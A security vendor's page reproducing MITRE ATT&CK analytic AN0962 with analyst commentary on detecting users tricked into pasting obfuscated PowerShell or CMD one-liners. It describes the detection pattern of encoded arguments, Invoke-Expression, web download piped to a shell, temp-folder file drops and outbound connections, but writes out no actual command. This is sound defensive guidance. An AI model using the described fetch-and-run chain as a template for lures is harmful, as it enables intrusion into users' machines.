Live Active security incident? Get immediate response
MITRE ATT&CK® Analytic

AN0962: Analytic 0962

A user is socially engineered (web page, email, document) to open Run/PowerShell/CMD and paste an obfuscated one-liner. The chain is: (1) user context active in a browser/email/office app → (2) process creation of a command interpreter with suspicious arguments (base64/Invoke-Expression/web download/pipeline to shell) → (3) optional file drop in %TEMP% or %APPDATA% → (4) outbound network connection to an external domain. Events are correlated within a short window and with consistent user/session.

EnterpriseAN0962AnalyticObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence High

This analytic describes a Windows user being tricked into pasting an obfuscated command into Run, PowerShell, or CMD, followed by suspicious command execution, possible file creation in user-writable locations, and outbound network activity. The business issue is not just the command line itself; it is whether the organization can connect user activity, process creation, file writes, and network egress quickly enough to distinguish social-engineering-driven execution from normal administrative activity.

Executive priority

Prioritize this as a validation point for endpoint and SOC readiness on Windows. Leaders should ask whether telemetry from browsers, email or Office applications, command interpreters, user-writable directories, and outbound connections can be correlated by user and session within a short time window. This supports incident triage, user-focused response decisions, control evidence for audits, and investment decisions around endpoint logging, managed detection, and phishing-resistant operational controls.

Technical view

For SOC and detection teams, the supplied analytic is a correlation pattern: active user context in a browser, email, or Office application; near-term process creation of Run, PowerShell, or CMD with suspicious arguments such as encoded content, expression invocation, web download behavior, or piping into a shell; optional file creation under %TEMP% or %APPDATA%; and outbound connection to an external domain. Validate that Windows process creation, command-line arguments, parent or initiating process context, user/session identifiers, file creation events, and network destination data are available and joinable within the detection window. Because ATT&CK provides no separate official detection text or relationships for this object, tuning should be based on local administrative patterns and known business workflows.

Likely telemetry

  • Windows process creation events with full command-line arguments
  • Parent or initiating application context from browser, email client, or Office application
  • User and session identifiers that allow short-window correlation
  • File creation telemetry for %TEMP% and %APPDATA%
  • Endpoint or network telemetry showing outbound connections to external domains

Detection direction

  • Validate correlation across user context, command interpreter execution, file creation, and outbound network activity rather than alerting on a single weak indicator.
  • Tune for suspicious command-line features noted in the analytic, including encoded content, expression invocation, web download behavior, and shell pipelines.
  • Review false positives from administrators, helpdesk scripts, software installers, and legitimate automation that may use PowerShell or CMD with complex arguments.
  • Check blind spots where command-line logging is disabled, parent process context is missing, user/session identifiers are inconsistent, or network telemetry cannot be tied back to the endpoint process.
  • Because no ATT&CK relationship context is supplied, do not assume a specific tactic, actor, campaign, or malware family; use local enrichment and incident evidence.

Mitigation priorities

  • Ensure Windows endpoint logging captures process creation with command-line detail and sufficient parent-process context.
  • Improve correlation between endpoint, identity/session, file, and network telemetry in SIEM or managed detection workflows.
  • Restrict or monitor risky command interpreter use where business operations allow, especially for non-administrative users.
  • Harden user-facing social-engineering entry points through awareness, email/web controls, and safe handling guidance without relying on training alone.
  • Prepare incident response playbooks for suspected user-pasted command execution, including endpoint containment, user interview, artifact collection, and review of outbound destinations.
Analyst notes and limits

This is a detection analytic, not a technique object. Its value is in testing whether the organization can see and correlate a socially engineered Windows command-execution chain. The supplied object does not specify ATT&CK tactics and provides no related objects, so this take stays focused on defensive validation rather than attribution or broader campaign context.

Official detection text is not provided, and no relationships are supplied. The object only supports Windows-specific discussion. Local environment baselines, approved administrative tooling, logging configuration, and network architecture are required to determine alert thresholds and response severity.

Official MITRE ATT&CK definition

Analytic 0962

A user is socially engineered (web page, email, document) to open Run/PowerShell/CMD and paste an obfuscated one-liner. The chain is: (1) user context active in a browser/email/office app → (2) process creation of a command interpreter with suspicious arguments (base64/Invoke-Expression/web download/pipeline to shell) → (3) optional file drop in %TEMP% or %APPDATA% → (4) outbound network connection to an external domain. Events are correlated within a short window and with consistent user/session.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
58505aa1081724cc...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle 58505aa10817…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    mitre-attack AN0962
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use